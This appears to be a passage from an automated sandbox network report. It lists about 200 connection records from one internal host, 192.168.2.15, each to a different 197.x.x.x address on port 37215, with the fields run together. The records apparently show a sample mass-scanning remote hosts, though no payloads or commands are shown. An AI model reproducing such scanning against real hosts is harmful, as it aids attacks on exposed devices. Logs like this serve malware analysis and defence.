                                                                            25993192.168.2.1537856197.229.65.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25994192.168.2.1560732197.113.238.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25995192.168.2.1550180197.75.114.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25996192.168.2.1535822197.34.87.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25997192.168.2.1559748197.134.221.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25998192.168.2.1548042197.183.244.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25999192.168.2.1555454197.254.25.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26000192.168.2.1535186197.38.54.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26001192.168.2.1543938197.206.137.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26002192.168.2.1536768197.38.54.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26003192.168.2.1542720197.9.51.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26004192.168.2.1543434197.155.83.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26005192.168.2.1540980197.172.198.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26006192.168.2.1545456197.23.54.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26007192.168.2.1548124197.185.205.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26008192.168.2.1559578197.23.116.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26009192.168.2.1535492197.158.144.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26010192.168.2.1550104197.151.47.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26011192.168.2.1545358197.178.102.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26012192.168.2.1539224197.196.64.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26013192.168.2.1543100197.205.62.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26014192.168.2.1532798197.255.220.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26015192.168.2.1536728197.8.155.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26016192.168.2.1543722197.80.163.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26017192.168.2.1555776197.0.50.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26018192.168.2.1548862197.109.64.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26019192.168.2.1547184197.118.252.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26020192.168.2.1540858197.128.229.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26021192.168.2.1547818197.145.76.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26022192.168.2.1540072197.69.133.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26023192.168.2.1543730197.45.239.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26024192.168.2.1555712197.17.84.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26025192.168.2.1558302197.212.234.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26026192.168.2.1539516197.95.60.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26027192.168.2.1558604197.249.237.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26028192.168.2.1542604197.121.168.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26029192.168.2.1553496197.209.109.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26030192.168.2.1533866197.223.78.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26031192.168.2.1554934197.110.51.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26032192.168.2.1545068197.210.232.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26033192.168.2.1556488197.189.61.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26034192.168.2.1542994197.134.201.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26035192.168.2.1560546197.209.208.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26036192.168.2.1537534197.121.78.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26037192.168.2.1558100197.73.158.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26038192.168.2.1540230197.22.190.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26039192.168.2.1537094197.47.75.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26040192.168.2.1542018197.69.186.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26041192.168.2.1532982197.178.137.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26042192.168.2.1547084197.207.63.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26043192.168.2.1548010197.71.175.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26044192.168.2.1537792197.14.51.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26045192.168.2.1544418197.11.50.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26046192.168.2.1549950197.20.159.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26047192.168.2.1545846197.44.228.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26048192.168.2.1540066197.34.77.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26049192.168.2.1548772197.245.129.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26050192.168.2.1536386197.63.43.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26051192.168.2.1552526197.56.203.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26052192.168.2.1546594197.140.183.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26053192.168.2.1542316197.215.56.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26054192.168.2.1554026197.178.64.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26055192.168.2.1539264197.124.72.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26056192.168.2.1547086197.216.213.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26057192.168.2.1553512197.213.164.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26058192.168.2.1558376197.79.37.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26059192.168.2.1535790197.12.222.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26060192.168.2.1537256197.169.76.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26061192.168.2.1535892197.32.215.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26062192.168.2.1554646197.3.242.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26063192.168.2.1551980197.111.37.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26064192.168.2.1549316197.85.127.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26065192.168.2.1555738197.22.109.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26066192.168.2.1556370197.59.250.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26067192.168.2.1545966197.64.104.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26068192.168.2.1536040197.81.220.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26069192.168.2.1556446197.86.160.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26070192.168.2.1551190197.176.139.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26071192.168.2.1551014197.105.24.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26072192.168.2.1551318197.226.104.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26073192.168.2.1559170197.96.156.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26074192.168.2.1552540197.85.233.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26075192.168.2.1557986197.55.151.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26076192.168.2.1552650197.31.209.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26077192.168.2.1551040197.163.186.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26078192.168.2.1560942197.56.7.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26079192.168.2.1560846197.213.26.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26080192.168.2.1557922197.199.43.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26081192.168.2.1549830197.7.174.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26082192.168.2.1544460197.187.183.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26083192.168.2.1554298197.207.236.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26084192.168.2.1536444197.82.159.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26085192.168.2.1546550197.124.25.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26086192.168.2.1555094197.133.208.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26087192.168.2.1538196197.39.128.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26088192.168.2.1550124197.130.167.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26089192.168.2.1548228197.6.215.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26090192.168.2.1543446197.31.157.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26091192.168.2.1545412197.188.183.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26092192.168.2.1545380197.81.88.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26093192.168.2.1552800197.111.101.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26094192.168.2.1533146197.140.173.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26095192.168.2.1554332197.59.12.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26096192.168.2.1552322197.112.222.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26097192.168.2.1534432197.155.81.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26098192.168.2.1535890197.249.232.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26099192.168.2.1553328197.140.242.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26100192.168.2.1540116197.77.77.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26101192.168.2.1544836197.196.173.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26102192.168.2.1536848197.11.76.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26103192.168.2.1560652197.157.232.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26104192.168.2.1548166197.153.199.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26105192.168.2.1557004197.225.164.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26106192.168.2.1542428197.38.222.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26107192.168.2.1543078197.99.19.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26108192.168.2.1550578197.64.76.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26109192.168.2.1535000197.182.248.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26110192.168.2.1545334197.141.253.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26111192.168.2.1549690197.78.8.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26112192.168.2.1551852197.69.48.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26113192.168.2.1539844197.212.246.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26114192.168.2.1535656197.71.191.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26115192.168.2.1532920197.224.229.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26116192.168.2.1538022197.62.18.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26117192.168.2.1551456197.231.87.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26118192.168.2.1549164197.52.147.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26119192.168.2.1545194197.165.44.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26120192.168.2.1548516197.143.135.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26121192.168.2.1558634197.95.99.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26122192.168.2.1556110197.87.79.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26123192.168.2.1540686197.208.222.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26124192.168.2.1532990197.209.111.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26125192.168.2.1549148197.169.199.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26126192.168.2.1541736197.182.72.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26127192.168.2.1544526197.235.189.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26128192.168.2.1543116197.34.3.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26129192.168.2.1553750197.89.125.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26130192.168.2.1534348197.175.54.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26131192.168.2.1544640197.12.14.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26132192.168.2.1541550197.41.61.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26133192.168.2.1542256197.192.189.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26134192.168.2.1546410197.73.228.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26135192.168.2.1554252197.66.109.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26136192.168.2.1543394197.156.76.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26137192.168.2.1552306197.106.77.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26138192.168.2.1558884197.77.141.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26139192.168.2.1542650197.160.108.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26140192.168.2.1536738197.73.92.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26141192.168.2.1539306197.233.54.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26142192.168.2.1558398197.225.228.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26143192.168.2.1554068197.224.83.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26144192.168.2.1551280197.13.110.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26145192.168.2.1556720197.47.7.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26146192.168.2.1539300197.53.48.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26147192.168.2.1546240197.36.124.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26148192.168.2.1553270197.28.160.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26149192.168.2.1534072197.81.11.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26150192.168.2.1543310197.66.59.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26151192.168.2.1544756197.239.204.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26152192.168.2.1539306197.156.107.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26153192.168.2.1550018197.188.252.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26154192.168.2.1556318197.92.156.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26155192.168.2.1557008197.61.39.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26156192.168.2.1540538197.85.23.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26157192.168.2.1549018197.31.120.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26158192.168.2.1533472197.124.253.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26159192.168.2.1557220197.96.52.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26160192.168.2.1550524197.223.43.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26161192.168.2.1542866197.57.5.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26162192.168.2.1547326197.104.150.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26163192.168.2.1544918197.229.242.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26164192.168.2.1547498197.82.51.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26165192.168.2.1546788197.98.136.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26166192.168.2.1556652197.17.228.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26167192.168.2.1557340197.255.215.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26168192.168.2.1553598197.18.177.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26169192.168.2.1543360197.206.33.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26170192.168.2.1546482197.167.74.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26171192.168.2.1547858197.144.117.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26172192.168.2.1559952197.117.102.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26173192.168.2.1558340197.28.29.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26174192.168.2.1536388197.136.24.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26175192.168.2.1546368197.114.212.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26176192.168.2.1548536197.237.231.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26177192.168.2.1558184197.230.5.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26178192.168.2.1534836197.203.84.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26179192.168.2.1547800197.87.202.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26180192.168.2.1533150197.238.64.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26181192.168.2.1560930197.221.140.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26182192.168.2.1557890197.216.33.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26183192.168.2.1537536197.84.50.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26184192.168.2.1536428197.26.157.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26185192.168.2.1541374197.29.187.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26186192.168.2.1537594197.28.35.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26187192.168.2.1535750197.71.51.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26188192.168.2.1532886197.125.60.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26189192.168.2.1551232197.1.170.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26190192.168.2.1539532197.67.53.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26191192.168.2.1551796197.36.163.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26192192.168.2.1542974197.77.0.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
